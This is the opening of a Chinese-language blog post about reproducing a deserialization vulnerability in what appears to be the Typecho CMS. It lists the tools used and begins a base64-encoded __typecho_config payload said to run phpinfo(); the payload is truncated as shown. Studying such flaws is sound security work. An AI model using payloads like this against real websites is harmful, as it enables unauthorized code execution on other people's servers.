0x00 前言
很久没有在安全方面折腾,突然收到“爸爸云”的短信,“您的服务器xxx.xxx.xxx.xxx存在网站后门,为防止黑客进一步入侵,请登录进行查看和处理”。当时正在出差,手头没电脑,草草看了一眼没来得及处理,最近得空研究了研究。常在河边走,哪有不湿鞋,网上已经有该漏洞的详解,仅以此文记录对反序列化漏洞研究的一个学习过程。
0x01 漏洞复现
使用工具:
1、Firefox浏览器+HackBar插件
2、Payload
下面这段Payload是执行 phpinfo();
__typecho_config=
YToyOntzOjc6ImFkYXB0
ZXIiO086MTI6I...